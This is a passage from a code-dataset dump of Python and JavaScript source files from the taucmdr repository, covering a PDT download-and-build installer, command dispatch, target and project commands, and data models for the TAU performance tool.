LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\nimport shutil\nimport platform\nimport subprocess\n\n# TAU modules\nimport cf\nimport logger\nimport util\nimport error\nimport environment as env\n\n\nLOGGER = logger.getLogger(__name__)\n\nDEFAULT_SOURCE = 'http://tau.uoregon.edu/pdt.tgz'\n\ndef _detectDefaultHostOS():\n \"\"\"\n Detect the default host operating system\n \"\"\"\n return platform.system()\nDEFAULT_HOST_OS = _detectDefaultHostOS()\n\n\ndef _detectDefaultHostArch():\n \"\"\"\n Use PDT's archfind script to detect the host target architecture\n \"\"\"\n here = os.path.dirname(os.path.realpath(__file__))\n cmd = os.path.join(os.path.dirname(here), 'util', 'archfind', 'archfind')\n return subprocess.check_output(cmd).strip()\nDEFAULT_HOST_ARCH = _detectDefaultHostArch()\n\n\n#def _detectDefaultDeviceArch():\n# \"\"\"\n# Detect coprocessors\n# \"\"\"\n# return None\n#DEFAULT_DEVICE_ARCH = _detectDefaultDeviceArch()\n\ndef _getFortranConfigureFlag(compiler):\n if compiler.family != 'MPI':\n family_map = {'GNU': 'gfortran',\n 'Intel': 'intel'}\n try:\n return family_map[compiler.family]\n except KeyError:\n raise InternalError(\"Unknown compiler family for Fortran: '%s'\" % compiler.family)\n else:\n # TODO: Recognize family from MPI compiler\n raise InternalError(\"Unknown compiler family for Fortran: '%s'\" % compiler.family)\n\ndef verifyInstallation(prefix, arch, cc=None, cxx=None, fortran=None):\n \"\"\"\n Returns True if there is a working PDT installation at 'prefix' or raisestau.\n a error.ConfigurationError describing why that installation is broken.\n \"\"\"\n LOGGER.debug(\"Checking PDT installation at '%s' targeting arch '%s'\" % (prefix, arch))\n \n if not os.path.exists(prefix):\n raise error.ConfigurationError(\"'%s' does not exist\" % prefix)\n bin = os.path.join(prefix, arch, 'bin')\n lib = os.path.join(prefix, arch, 'lib')\n\n # Check for all commands\n# for cmd in COMMANDS:\n# path = os.path.join(bin, cmd)\n# if not os.path.exists(path):\n# raise error.ConfigurationError(\"'%s' is missing\" % path)\n# if not os.access(path, os.X_OK):\n# raise error.ConfigurationError(\"'%s' exists but is not executable\" % path)\n# \n# # Check that there is at least one makefile\n# makefile = os.path.join(prefix, 'include', 'Makefile')\n# if not os.path.exists(makefile):\n# raise error.ConfigurationError(\"'%s' does not exist\" % makefile)\n# \n# # Check for the minimal config 'vanilla' makefile\n# makefile = os.path.join(lib, 'Makefile.tau')\n# if not os.path.exists(makefile):\n# LOGGER.warning(\"TAU installation at '%s' does not have a minimal Makefile.tau.\" % prefix)\n#\n# taudb_prefix = os.path.join(os.path.expanduser('~'), '.ParaProf')\n# LOGGER.debug(\"Checking tauDB installation at '%s'\" % taudb_prefix)\n# \n# if not os.path.exists(taudb_prefix):\n# raise error.ConfigurationError(\"'%s' does not exist\" % taudb_prefix)\n#\n# path = os.path.join(taudb_prefix, 'perfdmf.cfg')\n# if not os.path.exists(path):\n# raise error.ConfigurationError(\"'%s' does not exist\" % path)\n#\n# LOGGER.debug(\"tauDB installation at '%s' is valid\" % taudb_prefix)\n LOGGER.debug(\"PDT installation at '%s' is valid\" % prefix)\n return True\n\n\ndef initialize(prefix, src, force_reinitialize=False, \n arch=None, \n compiler_cmd=None):\n \"\"\"\n TODO: Docs\n \"\"\"\n pdt_prefix = os.path.join(prefix, 'pdt')\n if not arch:\n arch = detectDefaultHostArch()\n LOGGER.debug(\"Initializing pdt at '%s' from '%s' with arch=%s\" % (pdt_prefix, src, arch))\n\n # Check compilers\n cc = None\n cxx = None\n fortran = None\n if compiler_cmd:\n family = cf.compiler.getFamily(compiler_cmd[0])\n for comp in family['CC']:\n if util.which(comp.command):\n cc = comp.command\n break\n if not cc:\n raise error.ConfigurationError(\"Cannot find C compiler command!\")\n LOGGER.debug('Found CC=%s' % cc)\n for comp in family['CXX']:\n if util.which(comp.command):\n cxx = comp.command\n break\n if not cxx:\n raise error.ConfigurationError(\"Cannot find C++ compiler command!\")\n LOGGER.debug('Found CXX=%s' % cxx)\n for comp in family['FC']:\n if util.which(comp.command):\n # pdt's configure script has a goofy way of specifying the fortran compiler\n fortran = _getFortranConfigureFlag(comp)\n LOGGER.debug('Found FC=%s' % fortran)\n \n # Check if the installation is already initialized\n try:\n verifyInstallation(pdt_prefix, arch=arch, cc=cc, cxx=cxx, fortran=fortran)\n except error.ConfigurationError, err:\n LOGGER.debug(\"Invalid installation: %s\" % err)\n pass\n else:\n if not force_reinitialize:\n return\n \n # Control build output\n with logger.logging_streams():\n \n # Download, unpack, or copy pdt source code\n if src.lower() == 'download':\n src = DEFAULT_SOURCE\n src_prefix = os.path.join(prefix, 'src')\n dst = os.path.join(src_prefix, os.path.basename(src))\n try:\n util.download(src, dst)\n srcdir = util.extract(dst, src_prefix)\n except IOError:\n raise error.ConfigurationError(\"Cannot acquire source file '%s'\" % src,\n \"Check that the file or directory is accessable\")\n finally:\n try: os.remove(dst)\n except: pass\n \n # Initialize installation with a minimal configuration\n prefix_flag = '-prefix=%s' % pdt_prefix\n arch_flag = '-arch=%s' % arch if arch else ''\n cmd = ['./configure', prefix_flag, arch_flag]\n LOGGER.debug('Creating configure subprocess in %r: %r' % (srcdir, cmd))\n LOGGER.info('Configuring PDT...\\n %s' % ' '.join(cmd))\n proc = subprocess.Popen(cmd, cwd=srcdir, stdout=sys.stdout, stderr=sys.stderr)\n if proc.wait():\n raise error.ConfigurationError('pdt configure failed')\n \n # Execute make\n cmd = ['make', '-j4', 'install']\n LOGGER.debug('Creating make subprocess in %r: %r' % (srcdir, cmd))\n LOGGER.info('Compiling PDT...\\n %s' % ' '.join(cmd))\n proc = subprocess.Popen(cmd, cwd=srcdir, stdout=sys.stdout, stderr=sys.stderr)\n if proc.wait():\n raise error.ConfigurationError('pdt compilation failed.')\n\n # Leave source, we'll probably need it again soon\n LOGGER.debug('Preserving %r for future use' % srcdir)\n \n# # Initialize tauDB with a minimal configuration\n# taudb_configure = os.path.join(tau_prefix, arch, 'bin', 'taudb_configure')\n# cmd = [taudb_configure, '--create-default']\n# LOGGER.debug('Creating subprocess: %r' % cmd)\n# LOGGER.info('Configuring tauDB...\\n %s' % ' '.join(cmd))\n# proc = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr)\n# if proc.wait():\n# raise error.ConfigurationError('tauDB configure failed.')\n\n # Add pdt to PATH\n env.PATH.append(os.path.join(pdt_prefix, arch, 'bin'))\n LOGGER.info('pdt configured successfully')\n\n\n\n## System modules\n#import os\n#import sys\n#import subprocess\n#import shutil\n#\n## TAU modules\n#from tau import getLogger\n#from util import download, extract\n#from pkgs import Package\n#from error import InternalError, PackageError, ConfigurationError\n#from registry import getRegistry\n#\n#LOGGER = logger.getLogger(__name__)\n#\n#\n#class PdtPackage(Package):\n# \"\"\"\n# Program Database Toolkit package\n# \"\"\"\n# \n# SOURCES = ['http://tau.uoregon.edu/pdt.tgz']\n#\n# def __init__(self, project):\n# super(PdtPackage, self).__init__(project)\n# self.system_prefix = os.path.join(getRegistry().system.prefix, \n# self.project.target_prefix, 'pdt')\n# self.user_prefix = os.path.join(getRegistry().user.prefix, \n# self.project.target_prefix, 'pdt')\n#\n# def install(self, stdout=sys.stdout, stderr=sys.stderr):\n# config = self.project.config\n# pdt = config['pdt']\n# if not pdt:\n# raise InternalError('Tried to install pdt when (not config[\"pdt\"])')\n#\n# for loc in [self.system_prefix, self.user_prefix]:\n# if os.path.isdir(loc):\n# LOGGER.info(\"Using PDT installation found at %s\" % loc)\n# self.prefix = loc\n# return\n# \n# # Try to install systemwide\n# if getRegistry().system.isWritable():\n# self.prefix = self.system_prefix\n# elif getRegistry().user.isWritable():\n# self.prefix = self.user_prefix\n# else:\n# raise ConfigurationError(\"User-level TAU installation at %r is not writable\" % self.user_prefix,\n# \"Check the file permissions and try again\") \n# LOGGER.info('Installing PDT at %r' % self.prefix)\n#\n# if pdt.lower() == 'download':\n# src = self.SOURCES\n# elif os.path.isdir(pdt):\n# LOGGER.debug('Assuming user-supplied PDT at %r is properly installed' % pdt)\n# return\n# elif os.path.isfile(pdt):\n# src = ['file://'+pdt]\n# LOGGER.debug('Will build PDT from user-specified file %r' % pdt)\n# else:\n# raise PackageError('Invalid PDT directory %r' % pdt, \n# 'Verify that the directory exists and that you have correct permissions to access it.')\n#\n# # Configure the source code for this configuration\n# srcdir = self._getSource(src, stdout, stderr)\n# cmd = self._getConfigureCommand()\n# LOGGER.debug('Creating configure subprocess in %r: %r' % (srcdir, cmd))\n# LOGGER.info('Configuring PDT...\\n%s' % ' '.join(cmd))\n# proc = subprocess.Popen(cmd, cwd=srcdir, stdout=stdout, stderr=stderr)\n# if proc.wait():\n# shutil.rmtree(self.prefix, ignore_errors=True)\n# raise PackageError('PDT configure failed.')\n# \n# # Execute make\n# cmd = ['make', '-j']\n# LOGGER.debug('Creating make subprocess in %r: %r' % (srcdir, cmd))\n# LOGGER.info('Compiling PDT...\\n%s' % ' '.join(cmd))\n# proc = subprocess.Popen(cmd, cwd=srcdir, stdout=stdout, stderr=stderr)\n# if proc.wait():\n# shutil.rmtree(self.prefix, ignore_errors=True)\n# raise PackageError('PDT compilation failed.')\n# \n# # Execute make install\n# cmd = ['make', 'install']\n# LOGGER.debug('Creating make subprocess in %r: %r' % (srcdir, cmd))\n# LOGGER.info('Installing PDT...\\n%s' % ' '.join(cmd))\n# proc = subprocess.Popen(cmd, cwd=srcdir, stdout=stdout, stderr=stderr)\n# if proc.wait():\n# shutil.rmtree(self.prefix, ignore_errors=True)\n# raise PackageError('PDT installation failed.')\n# \n# # Cleanup\n# LOGGER.debug('Recursively deleting %r' % srcdir)\n# shutil.rmtree(srcdir)\n# LOGGER.info('PDT installation complete.')\n# \n# def uninstall(self, stdout=sys.stdout, stderr=sys.stderr):\n# LOGGER.debug('Recursively deleting %r' % self.prefix)\n# shutil.rmtree(self.prefix)\n# LOGGER.info('PDT uninstalled.')\n#\n# def _getConfigureCommand(self):\n# \"\"\"\n# Returns the command that will configure PDT\n# \"\"\"\n# # TODO: Support other compilers\n# return ['./configure', '-GNU', '-prefix=%s' % self.prefix]\n#\n# def _getSource(self, sources, stdout, stderr):\n# \"\"\"\n# Downloads or copies PDT source code\n# \"\"\"\n# source_prefix = os.path.join(self.project.registry.prefix, 'src')\n# for src in sources:\n# dst = os.path.join(source_prefix, os.path.basename(src))\n# if src.startswith('http://') or src.startswith('ftp://'):\n# try:\n# download(src, dst, stdout, stderr)\n# except:\n# continue\n# elif src.startswith('file://'):\n# try:\n# shutil.copy(src, dst)\n# except:\n# continue\n# else:\n# raise InternalError(\"Don't know how to acquire source file %r\" % src)\n# src_path = extract(dst, source_prefix)\n# os.remove(dst)\n# return src_path\n# raise PackageError('Failed to get source code')\n#\n" }, { "alpha_fraction": 0.6562147736549377, "alphanum_fraction": 0.6620352864265442, "avg_line_length": 30.892215728759766, "blob_id": "792e2e23778c9476ea57e490b1ffe05b4469b68b", "content_id": "170b57e317d92a8cc0b75c24c7ef2e4062e59c89", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5326, "license_type": "permissive", "max_line_length": 103, "num_lines": 167, "path": "/packages/tau/commands/__init__.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport sys\nfrom pkgutil import walk_packages\n\n# TAU modules\nimport logger\nimport error\n\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass UnknownCommandError(error.ConfigurationError):\n \"\"\"\n Indicates that a specified command is unknown\n \"\"\"\n \n message_fmt = \"\"\"\n%(value)r is not a valid TAU command.\n\n%(hint)s\"\"\"\n \n def __init__(self, value, hint=\"Try 'tau --help'.\"):\n super(UnknownCommandError, self).__init__(value, hint)\n\n\nclass AmbiguousCommandError(error.ConfigurationError):\n \"\"\"\n Indicates that a specified partial command is ambiguous\n \"\"\"\n message_fmt = \"\"\"\nCommand %(value)r is ambiguous: %(matches)r\n\n%(hint)s\"\"\"\n def __init__(self, value, matches, hint=\"Try 'tau --help'.\"):\n super(AmbiguousCommandError, self).__init__('Command %s is ambiguous: %s' % (value, matches), hint)\n\n\n_commands = {__name__: {}}\ndef getCommands(root=__name__):\n \"\"\"\n Returns commands at the specified level\n \"\"\"\n def _lookup(c, d):\n if len(c) == 1: return d[c[0]]\n else: return _lookup(c[1:], d[c[0]])\n\n def _walking_import(module, c, d):\n car, cdr = c[0], c[1:]\n if cdr:\n _walking_import(module, cdr, d[car])\n elif not car in d:\n d[car] = {}\n __import__(module)\n d[car]['__module__'] = sys.modules[module]\n\n command_module = sys.modules[__name__]\n for _, module, _ in walk_packages(command_module.__path__, command_module.__name__+'.'):\n try:\n _lookup(module.split('.'), _commands)\n except KeyError:\n _walking_import(module, module.split('.'), _commands)\n\n return _lookup(root.split('.'), _commands)\n\n\ndef getCommandsHelp(root=__name__):\n \"\"\"\n Builds listing of command names with short description\n \"\"\"\n groups = {}\n commands = sorted([i for i in getCommands(root).iteritems() if i[0] != '__module__'])\n for cmd, topcmd in commands:\n module = topcmd['__module__']\n descr = getattr(module, 'SHORT_DESCRIPTION', \"FIXME: No description\")\n group = getattr(module, 'GROUP', None)\n name = '{:<12}'.format(cmd)\n groups.setdefault(group, []).append(' %s %s' % (name, descr))\n \n parts = []\n for group, members in groups.iteritems():\n if group:\n parts.append(group+' subcommands:')\n else:\n parts.append('subcommands:')\n parts.extend(members)\n parts.append('')\n return '\\n'.join(parts)\n\n\ndef executeCommand(cmd, cmd_args=[]):\n \"\"\"\n Import the command module and run its main routine\n \"\"\"\n def _resolve(c, d):\n if not c: \n return []\n car, cdr = c[0], c[1:]\n try:\n matches = [(car, d[car])]\n except KeyError:\n matches = [i for i in d.iteritems() if i[0].startswith(car)]\n if len(matches) == 1:\n return [matches[0][0]] + _resolve(cdr, matches[0][1])\n elif len(matches) == 0:\n raise UnknownCommandError(' '.join(cmd))\n elif len(matches) > 1:\n raise AmbiguousCommandError(' '.join(cmd), [m[0] for m in matches])\n\n while len(cmd):\n root = '.'.join([__name__] + cmd)\n try:\n main = getCommands(root)['__module__'].main\n except KeyError:\n LOGGER.debug('%r not recognized as a TAU command' % cmd)\n try:\n resolved = _resolve(cmd, _commands[__name__])\n except UnknownCommandError:\n if len(cmd) <= 1: \n raise # We finally give up\n parent = cmd[:-1]\n LOGGER.debug('Getting help from parent command %r' % parent)\n return executeCommand(parent, ['--help'])\n else:\n LOGGER.debug('Resolved ambiguous command %r to %r' % (cmd, resolved))\n return executeCommand(resolved, cmd_args)\n except AttributeError:\n raise InternalError(\"'main(argv)' undefined in command %r\" % cmd)\n else:\n return main(cmd_args)\n" }, { "alpha_fraction": 0.6881172060966492, "alphanum_fraction": 0.6913029551506042, "avg_line_length": 30.389999389648438, "blob_id": "3a12063d84bc0d805adcdaadc13723fcfdc2e270", "content_id": "b6d5302d9231b9982ce34a70d78586e535bb2054", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3139, "license_type": "permissive", "max_line_length": 97, "num_lines": 100, "path": "/packages/tau/commands/target/edit.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# TAU modules\nimport logger\nimport commands\nimport arguments as args\nfrom model.target import Target\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"Modify an existing target configuration.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s <target_name> [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\nPARSER = args.getParserFromModel(Target,\n use_defaults=False,\n prog=COMMAND, \n usage=USAGE,\n description=SHORT_DESCRIPTION)\nPARSER.add_argument('--rename',\n help=\"Rename the target configuration\",\n metavar='<new_name>', dest='new_name',\n default=args.SUPPRESS)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\"\n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n\n name = args.name\n if not Target.exists({'name': name}):\n PARSER.error(\"'%s' is not an target name. Type `tau target list` to see valid names.\" % name)\n\n updates = args.__dict__\n try:\n new_name = args.new_name\n except AttributeError:\n pass\n else:\n updates['name'] = new_name\n del updates['new_name']\n \n Target.update(updates, {'name': name})\n \n return commands.executeCommand(['target', 'list'], [args.name])\n" }, { "alpha_fraction": 0.644960880279541, "alphanum_fraction": 0.6472618579864502, "avg_line_length": 32.17557144165039, "blob_id": "51cd5592df1d26b35345ba5cb7ab9edb090d7266", "content_id": "8f14269683ecae73989e8e4370575df8dc5c4812", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4346, "license_type": "permissive", "max_line_length": 91, "num_lines": 131, "path": "/packages/tau/commands/project/list.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nfrom texttable import Texttable\nfrom pprint import pformat\n\n# TAU modules\nimport tau\nimport logger\nimport arguments as args\nimport environment as env\nfrom model.project import Project\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"List project configurations or show configuration details.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s [project_name] [project_name] ... [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\n_arguments = [(('names',), {'help': \"If given, show details for this project\",\n 'metavar': 'project_name', \n 'nargs': '*',\n 'default': args.SUPPRESS}),\n (('-l','--long'), {'help': \"Display all information about the project\",\n 'action': 'store_true',\n 'default': False})]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\" \n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n try:\n names = args.names\n except AttributeError:\n found = Project.all()\n else:\n found = []\n for name in names:\n t = Project.withName(name)\n if t:\n found.append(t)\n else:\n PARSER.error(\"No project configuration named '%s'\" % name)\n\n title = '{:=<{}}'.format('== Projects (%s) ==' % env.USER_PREFIX, \n logger.LINE_WIDTH)\n if not found:\n listing = \"No projects. See 'tau project create --help'\"\n else:\n table = Texttable(logger.LINE_WIDTH)\n headers = ['Name', 'Targets', 'Applications', 'Measurements', 'Home']\n rows = [headers]\n if args.long:\n parts = []\n for p in found:\n populated = p.populate()\n parts.append(pformat(populated))\n listing = '\\n'.join(parts)\n else:\n for p in found:\n populated = p.populate()\n targets = '\\n'.join([t['name'] for t in populated['targets']]) or ''\n applications = '\\n'.join([t['name'] for t in populated['applications']]) or ''\n measurements = '\\n'.join([t['name'] for t in populated['measurements']]) or ''\n row = [populated['name'], targets, applications, measurements, populated['prefix']]\n rows.append(row)\n table.add_rows(rows)\n listing = table.draw()\n \n LOGGER.info('\\n'.join([title, '', listing, '']))\n return tau.EXIT_SUCCESS\n" }, { "alpha_fraction": 0.5393794775009155, "alphanum_fraction": 0.5417661070823669, "avg_line_length": 15.411765098571777, "blob_id": "6844396951e401ad5885918cf0d17a4a94714518", "content_id": "d6f5f95361d55c9eb7884123f756544929645891", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 838, "license_type": "permissive", "max_line_length": 108, "num_lines": 51, "path": "/commander/api/models/Compiler.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n* Compiler.js\n*\n* @description :: TODO: You might write a short summary of how this model works and what it represents here.\n* @docs :: http://sailsjs.org/#!documentation/models\n*/\n\nmodule.exports = {\n\n schema: true,\n\n attributes: {\n\n // One-to-many association\n target: {\n model: 'Target', \n required: true \n },\n\n // Compiler language\n language: {\n type: 'string',\n required: true\n },\n\n // Compiler family name, e.g. 'intel'\n family_name: {\n type: 'string',\n required: true\n },\n\n // Compiler version\n version: {\n type: 'string',\n required: true\n },\n\n // Compiler command\n command: {\n type: 'string',\n required: true\n },\n\n // MD5 sum of compiler exe\n command_md5: {\n type: 'string',\n required: true\n }\n\n }\n};\n\n" }, { "alpha_fraction": 0.5628882050514221, "alphanum_fraction": 0.5642856955528259, "avg_line_length": 29.66666603088379, "blob_id": "0b258e733bda9f268488a4aa0bc4b4a1c4995e06", "content_id": "83fe18dab67911bbf0a6c17c1172cddafe5b39c1", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6440, "license_type": "permissive", "max_line_length": 95, "num_lines": 210, "path": "/packages/tau/model/target.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport string\nimport platform\nimport subprocess\n\n# TAU modules\nimport logger\nimport controller as ctl\nimport arguments as args\n\n\nLOGGER = logger.getLogger(__name__)\n\n\ndef defaultHostOS():\n \"\"\"\n Detect the default host operating system\n \"\"\"\n return platform.system()\n\ndef defaultHostArch():\n \"\"\"\n Use TAU's archfind script to detect the host target architecture\n \"\"\"\n here = os.path.dirname(os.path.realpath(__file__))\n cmd = os.path.join(os.path.dirname(here), 'util', 'archfind', 'archfind')\n return subprocess.check_output(cmd).strip()\n\ndef defaultDeviceArch():\n \"\"\"\n Detect coprocessors\n \"\"\"\n # TODO\n return None\n\ndef defaultCC():\n \"\"\"\n Detect target's default C compiler\n \"\"\"\n # TODO\n return 'gcc'\n\ndef defaultCXX():\n \"\"\"\n Detect target's default C compiler\n \"\"\"\n # TODO\n return 'g++'\n\ndef defaultFC():\n \"\"\"\n Detect target's default C compiler\n \"\"\"\n # TODO\n return 'gfortran'\n\n\nclass Target(ctl.Controller, ctl.ByName):\n \"\"\"\n Target data model controller\n \"\"\"\n \n attributes = {\n 'projects': {\n 'collection': 'Project',\n 'via': 'targets'\n },\n 'name': {\n 'type': 'string',\n 'unique': True,\n 'argparse': {'help': 'Target configuration name',\n 'metavar': '<target_name>'}\n },\n 'host_os': {\n 'type': 'string',\n 'required': True,\n 'defaultsTo': defaultHostOS(),\n 'argparse': {'flags': ('--host-os',),\n 'group': 'target system',\n 'help': 'Host operating system',\n 'metavar': 'os'}\n },\n 'host_arch': {\n 'type': 